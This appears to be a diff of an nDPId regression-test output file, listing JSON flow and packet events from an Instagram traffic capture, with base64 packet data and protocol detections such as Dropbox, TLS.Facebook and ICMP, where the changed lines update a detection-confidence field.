{"hostname":"photos-a.ak.instagram.com","url":"photos-a.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11248829_853782121373976_909936934_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906017,"flow_last_seen":1436720906017,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906017,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1436720906017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"thread_ts_msec":1436720906017,"pkt":"\/\/\/\/\/\/\/\/ABZEH1lmCABFAACDA5AAAIARdcjAqABq\/\/\/\/\/0RcRFwAb\/+ueyJob3N0X2ludCI6IDQxMzc2NzExNiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDA5Mjk0MDNdfQ=="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906017,"flow_last_seen":1436720906017,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906017,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906017,"flow_last_seen":1436720906017,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906017,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1436720906019,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"thread_ts_msec":1436720906019,"pkt":"\/\/\/\/\/\/\/\/ABZEH1lmCABFAACDA5EAAIARdcfAqABq\/\/\/\/\/0RcRFwAb\/+ueyJob3N0X2ludCI6IDQxMzc2NzExNiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDA5Mjk0MDNdfQ=="} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1436720906020,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"thread_ts_msec":1436720906020,"pkt":"\/\/\/\/\/\/\/\/ABZEH1lmCABFAACDA5IAAIARdcbAqABq\/\/\/\/\/0RcRFwAb\/+ueyJob3N0X2ludCI6IDQxMzc2NzExNiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDA5Mjk0MDNdfQ=="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906022,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1436720906022,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"thread_ts_msec":1436720906022,"pkt":"\/\/\/\/\/\/\/\/ABZEH1lmCABFAACDA5MAAIARtB3AqABqwKgA\/0RcRFwAbz4HeyJob3N0X2ludCI6IDQxMzc2NzExNiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDA5Mjk0MDNdfQ=="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906022,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906022,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906025,"flow_last_seen":1436720906025,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1436720906025,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.255","src_port":520,"dst_port":520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1436720906025,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720906025,"pkt":"\/\/\/\/\/\/\/\/ABsv8H60CABFAAA0BsVAAEARsaPAqAABwKgA\/wIIAggAILagAgEAAAACAADAqAAAAAAAAAAAAAAAAAAB"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906070,"flow_last_seen":1436720906070,"flow_idle_time":7580000,"flow_min_l4_payload_len":613,"flow_max_l4_payload_len":613,"flow_tot_l4_payload_len":613,"flow_avg_l4_payload_len":613,"midstream":1,"thread_ts_msec":1436720906070,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1436720906070,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":679,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":679,"pkt_l4_len":645,"thread_ts_msec":1436720906070,"pkt":"QPMIw47hABsv8H60CABFAAKZYWZAAFUGhKgfDV00wKgAZwG7hI6seG5hv38UHoAYAGuTKQAAAQEICltMYqkAA+18FwMBAmCl7hwsC927JcFSAZYWLzz9PCOE13q\/R1R\/4Ep\/l7+HHbIpOFFcCYs42I3wFOgWiBw3wjx3pJOgTGydZF67jt6\/BKND+v8oyfRpnqlS5YMAWUNymHV7uHWxp+hxonkw6cNC93nRZtrxzkz6LP0NT0kghBPZC1Qj+5R6TJU9O4JNVgnaOk7a2PLjjlpxNviWyDprqQXVx0ggqtiTSBMr7Uc5EfDpzAAkL4Ijs+Gp7u5RRsTL\/vjjpIbFtLB91jbWUmuE049zO8Z0ZXe+NUKtpOUeDZz+3zpQ7uf3ydorfitQX7zdybIk3\/bzSVhOShF3BJrYBLAD2AQ24us0\/KfVGECFrd6OK2BQqjf6ncI9qOXNwiVF\/2inbzY\/Q3OsYRcS7XHEaq0O5REHcT8SzE5VoLX4XXQtBoZwVB5Yrj77GtBQdmGZD6u8UMQpctBx6N9Mr51OWWfdFnAbts6SnZuXGzlYjqJOxS7Vx73Uw8fCkf1IEri8UI1qbM9veDNciQdo3CmVyvU7iM87rUz7C0f+A4f1opsUJ5+EheBr1eGc36Efb4\/Ualnnz3nkJR3hncStDick4US+OxlgvGof266YJgZuAwCGxYg4vW2knDKYz5umzCws7lIHpIdAFNPByVtoUTPTPQS5UKgIEdb95j7F6DccGwtWvRW1Al5LucPJI7zWS2dtNSdT\/Ojj1Rno0QRGwZ45j0In5POotAgCjk30MTwIN5HhcpigFfTCmuPMsYmTn6MoC7DboyOfYCjSc6fhkNqfZ2xyKSzKyqklgdTHeGfRwO+op5ygRsksmKTJ1Q\/4mw=="} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906070,"flow_last_seen":1436720906070,"flow_idle_time":7580000,"flow_min_l4_payload_len":613,"flow_max_l4_payload_len":613,"flow_tot_l4_payload_len":613,"flow_avg_l4_payload_len":613,"midstream":1,"thread_ts_msec":1436720906070,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906070,"flow_last_seen":1436720906070,"flow_idle_time":7580000,"flow_min_l4_payload_len":613,"flow_max_l4_payload_len":613,"flow_tot_l4_payload_len":613,"flow_avg_l4_payload_len":613,"midstream":1,"thread_ts_msec":1436720906070,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1436720906070,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720906070,"pkt":"ABsv8H60QPMIw47hCABFAAA0Ga9AAEAG48TAqABnHw1dNISOAbu\/fxQerHhwxoAQAW09dwAAAQEICgAD7YxbTGKp"} 01772{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1436720908201,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908201,"pkt":"ABsv8H60QPMIw47hCABFAAPpGbBAAEAG4A7AqABnHw1dNISOAbu\/fxQerHhwxoAYAW1v8wAAAQEICgAD7mFbTGKpFwMBA7AOHMI1ALyiYU3ya6qg+prWQI\/n9ANspqMl7L4ePI46MbeMU\/IIKBcoHTRp\/G5Sihc5nIJHuC2+37mEcl691gW4u\/TM4cTkpTf1jvX2GQ4y6\/txghh7z8FoXfNbqCHIq72qOYxX78zowj+FiMRcWPEmeWcWoH+gdWfhPA\/lkpOWh7PAWcTM6YhVbfKMzFVog0eNO6nAQ6Db4QV49GBIVCzfrXCBVeXZAcW0CL72bBYmhxsuCeKWPO3s6v5st61\/TqBX2wKyuhuh0iYRoQoS\/wYMoppq1iw5UM\/55LosXWjVhX+LnpSLv52m8IfyQkh1vrv+SJ7KjFgIF5haejMGRgEB6k28tUeT6FGaiUo32klBF\/ovhJ\/7PzYE5+p1Zs2WdUsskxD79HTvK6ta+oXXgI8zxnT+FY6f4Y3Qg+b6yTS68sbWyHT6\/PezdvhWfHtL0SSgHp8goibROD\/tT\/ewXwhvrOEixGKhip+cFDAiL8AxMi3V3Lo6cis85J1puKveGyk09JQyFUAk\/2r5Yl++ASyNB2yelevEI5wg+VsEb8Rcm\/QA7noQyfs1T5YOnO8NCBiPmye5eIk\/wZxnX1f+2xdUrgycDikO6k0cQg3utcfRP10t4qmvTrg2ek70WkuE+ATLg2Um1eRaeb81BxGpDBojTreWbcm5dcICJMpu5Jn\/w\/\/OFgLDd8zIcqEDUouT6ZCScciar49BKHurWy8NKFla9SI75KJQz9yq3QZyAG0rJc2lhQMyl9+7b4Ogizx8Jo29kTu8fZJSlg+ABrC1jcExXQD49OmAnZxwfKy6D2pC9Rse0qtqmzV+ovVEbJp+oxkyoXka2nmc36kfQhlZgI7KVixFLMTTlCevMnYrq1xJ\/MKzvCd6IWf+N5EocWD+ilOqptHNEIAOXJmgXODhL5KGWjQb8\/91W1IyUi6q\/ngSGvVRUpY8iujk6L\/C+Bbj\/Dm4AkcumBcragxaghvlWXmc47QSkqomVkZppr19doVE596Z\/iAcdVNMq1wy+2v27UYh5CMr3l5X59P07fb7g36BHbE7SHRjrHyy9CTFMxhEf0YgUq5TdIHDFI5lE\/KxLNZVidU3ki5Un7VFtJrfQka6os1jVOGfB9pUZq5Qsmwf1i\/ygu+C28zlN53MQWP6wHjI3WJZUBr81SukNH57IK2c2EyIu0E+HAgTgoJHe51A\/fUmZ1cYv7+JWrlM8pRHdKg4V83a8+0QRZUGb14qwNk4zB82iOuTyKlfeqGDo1mtsQ=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908216,"flow_last_seen":1436720908216,"flow_idle_time":7580000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908216,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01761{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1436720908216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908216,"pkt":"ABsv8H60QPMIw47hCABFAAPpl5BAAEAGYi7AqABnHw1dNISPAbuBQH+NqOzE9YAYAR7+6wAAAQEICgAD7mJbGFWXFwMBA7DGXKcxYYzj4PsFQPMmYQehh8iuvFDU6ChyMypfRInDCFuixSLIKOq63dIUv38njMJN2kVy\/t+T8m9xPVbEGAFdD3PpSc3SZZnBHiv5tCRNZzMhDLWXPkOIN9Lutipqd5IVnEEsBFkO\/fZ2K81T8PYPXOUELo\/sV11FwruvuAKdrrJSJDxsNb8ZavjfuhrjTCNZ8992aq+Ku9jOSU4Xa7Q\/BYCty1PvPxxBeD0eYCG+tOtkysHtjUZlr1d4OQxDr\/61YS0x9iJOXjnMBoobCu17VKBkd2hUXNptzi\/uIUhzamB9Rremxs\/xa5ErUN6bjCfTqClJMKTo2+EPLLC2OrnUwhZPfwAqX4LMjZxrO4OjWeKTq0PJEWrYJt\/hZgR9r16F85siGrf6FK1kTDvb0+vybKakTv5L4R+tKZVBNuaZabfxVkkl5TNMskAuzgaRl4NAmD9vaxsUvWa1r1eavZpU2b4i3TllipunjR4aQEFb47bl0X9Ru9Hl1x54J53nJ+MJknrPmdJbHBa5kRwAqKgaQptXtnMz1WTWV+Q8a53Upaic+O0txvujdC90+KUOiiTbhfTw0gAmNmPQmi2l+V2tphQpp2jEsWxETCl2LSUnlcR9XDLGnBO3KYnN9C0+k2yBKCMObHAcOzwdJWheAOhMNBVSNpFtrfOE6uSTsVbDj23xeCxxC1QAM7YJmxoVRhtdVyIDYYANmHTFeA\/uC6oLDeExrKyQP7kSEfNbdUqTNPu\/MJKIjJDZu1yLmyvi1O\/nGho5EDKw8IVXPxnfKKPvaQH2GtI88pEfGeAEyC\/HE\/tmFwWll7dh2qPp5A3wF8sKJ3O0eDAbcGfPED7oJA+EsxJAhKT6isvErCueBtWMHVSeiLsoME8tf6cS9zzgnk33LczZTQgm29MSHE7ZL2GeiGbzuGwrTGDnk1VDLJRove2wMug8H7\/TzDu7ltmYb22OyZHWPR+qBc0SXnC41HvKpdG4l5lloyRu51PXhn1Z4SBmRKxgHOd10WPpGH9Et\/GeMS7LFYrc7oqcb6G7UCvo5VgI1SuJrJeY0vV2tCM0MyJYykeRmE4\/7F1xpcmuoE1e5ET3+6eiLGpqXUS7VkABwgQafZxjQScCWI5pekzUYOfjX5epPROl\/DzQKTCdpj3Gvhf2XBY54ImjWPLE32kUQllKDfXNIYtYFjXJbjsc4Zka4\/X4kGWgbCWN+dmnakKME8cbt\/+4rEk8PQFIv1W4FPcpki7hccXc0xhFEqm0Sw=="} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908216,"flow_last_seen":1436720908216,"flow_idle_time":7580000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908216,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908216,"flow_last_seen":1436720908216,"flow_idle_time":7580000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908216,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1436720908259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908259,"pkt":"QPMIw47hABsv8H60CABFAAA0u1VAAFUGLR4fDV00wKgAZwG7hI+o7MT1gUCDQoAQAFyKzgAAAQEIClsYbBQAA+5i"} 02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1436720908432,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720908432,"pkt":"QPMIw47hABsv8H60CABFAAWqu1ZAAFUGJ6cfDV00wKgAZwG7hI+o7MT1gUCDQoAQAFzmhwAAAQEIClsYbL0AA+5iFwMBBgCkPdU4R6wGSIS3keHeixTLTI9zV+il0PpZ8q91YamIsd4IZ1iA9S2D6W\/nJ4T6403w2+fJe+hdEKNsk0963CdXOEXDNkQKpXOBBE+0Y\/4Fle8ueshRyGFFEoc6PtZpKpwayy+TKxEJ4pFJyX2oGMWjaZzaOyD59AskeV\/YOll+Xm0S27uMjZKkLBkCxDNPTNhB8fh\/syM9nxdE4huEu1SgtsgSRap7+5OfSJa0vJji4Lac5HIGGpVuCAdsaWkkirxUeGhBT5KqUaH3z34YK2q9OCFDjG6zQx+K5wB6\/1tRpCV4T0Wdq9iazWqTK9fhu3Q8m7M+n+OlMsKGxDIEQhTmUFv6EsILdWY4XaXzsNt68ilI12u8FIErHj5xADP5BSss+D\/PqbyyYfj1siM7kMLTpiPXuCUljd29w+P7wtJOUzlqcHwFv60jtkmE5R7DR9LN47rlhx2ZgEX8b9nsvGl\/Z1KSCJ1m3XV6f0806axX94l9imfNEVAHweCX3kOlfFNWODbpNzNbLbpVtPn7xKRA5Y140DajcNQvyREJ7DrHWIxbEPKUq+SIMaNEJqDkl0rYnPqvJYuixcmcTK6joyocw7sF+MmuWuJzAwYoGvQacoqaNqOp0iEPlyz8x6cTF7HbzVKHlLYHsfsKMGz98miVsnjvci5f7S+qZN8wJt+ycMpErrmm5SYVwnyDiARUnY01FjBiu7oXosmSU8r8tl1Y7oQcefwWQmUMJwEVoICnXk5o\/1P1fTAJawMxQor10OxDf\/BV8+4BnkZNbktKhC4u6rpy4t9mTFTFoJnekuOgtsyuYF1D1pTovQynkNog8sbNDLg6lOVy2sSjtN38M5BrjfWP6NvWf5rAbsDm9Qvw2VUkrLm+vXfuLJeKqhTOHspJB2ZVScw6fgqCCRgXV4hbT47jXkZHPFeUj3xtv5oznldP1XEp\/Y0YyZnWCMaWATZlGVUiSYeiFbrcd70L0WujcTQSesgJzHbOqeptYMiDDVIYXi5utFDZis9FPZA2ul\/lArmvEL\/urLFDKdnXMnNjyIIqJtwWZlcpDAHOfD2KyMM51NtnpD3NXBz6ngCZNoi3DrWeJbaK2NX4FFrr9nkmfuHb0MCV8zapTpFVeDqmiCnEMr1A22q06nZsJij0BS+jpAlud6+DjOPKWljFzy06Xn15YGW3Dm07Vi1rGNQXnlLIYZbH\/Lf9VbK8rn+tf2U4X+kmR\/seSiHTIiCrfQRY82NcG+s2JE\/3RNuUUsdP3+A8UZATxsKmMNb9p9jduLcV5NSz3qcz\/E+TORnhzC5qM5iDlSbThKZAPEgvS54QGz00rdEYWdvIwL1jLd2l2yP9aEoOWrH+sNsRBCU97PG1IRhRS5jctVYyDntPEBlAbqGj6sdT5C6POfN9JdpaIsZmGaMmnU0z4bjokazZ5F6F501SFGcsFKmgoCdZLCQyyA\/CkkbqEF1LeEPM1KkE88DAsVjRhjRCz9D6VKRt8PZdtywXXp7E7yF8+4SN\/2h5CqHv4N+v+ejLyvCd2t1L4BFuJ7BTwaB6NicxBq3cWSEeADsWxC4xODPl+fmk90gThIrGh3\/E3G\/K8LjJkXPwBqDPoSCAh\/lyvY4cI9USKSjdTboTHfChgT73IzMJk4MESnvGhexHkwWw4ndKaJ88XZfXiGJCI\/GHCwJX7Zu\/IG7bV7st4TnImk\/Ds\/xEG7y3JgmTAc9wIRPfDmTaMW0XI0vpt5j1BnCLq+es4TBuh9vggrd8U5G3S+2hj2u1HQPo3wjRAM4dNo6in8nnmD4n\/\/G9yrHWQwizkMQMUhZbY0jDslavyFSGnWc0JVIhfEzkCZm+lGdYxoDPUYKjjFRFeJ8o"} 00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908464,"flow_last_seen":1436720908464,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1436720908464,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1436720908464,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1436720908464,"pkt":"AAAAAAAAAAAAAAAACABFwABYvRcAAEABOq\/AqABnwKgAZwMDE08AAAAARQAAPFm5QABABkodwKgAZ63CKBTA+AG7+Mu3wgAAAACgAjkIlxQAAAIEBbQEAggKAAPuewAAAAABAwMG"} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908464,"flow_last_seen":1436720908464,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1436720908464,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.471674} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908464,"flow_last_seen":1436720908464,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1436720908464,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.471674} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1436720908464,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1436720908464,"pkt":"AAAAAAAAAAAAAAAACABFwABYvRcAAEABOq\/AqABnwKgAZwMDE08AAAAARQAAPFm5QABABkodwKgAZ63CKBTA+AG7+Mu3wgAAAACgAjkIlxQAAAIEBbQEAggKAAPuewAAAAABAwMG"} 